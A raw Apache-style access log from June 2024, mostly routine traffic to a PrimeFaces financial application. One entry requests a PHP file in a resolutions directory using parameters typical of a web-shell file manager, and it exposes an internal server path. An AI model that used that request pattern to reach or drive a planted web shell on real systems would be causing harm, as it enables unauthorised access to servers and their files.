190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 37877
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1420
190.25.103.31 - - [20/Jun/2024:04:43:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 111974
190.25.103.31 - - [20/Jun/2024:04:43:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.245.221.92 - - [20/Jun/2024:04:43:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:43:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
190.25.103.31 - - [20/Jun/2024:04:43:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 34942
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
47.128.25.198 - - [20/Jun/2024:04:43:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=1033.pdf&ft=img&white=1 HTTP/1.1" 200 41020
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 121143
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 31846
190.25.103.31 - - [20/Jun/2024:04:43:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
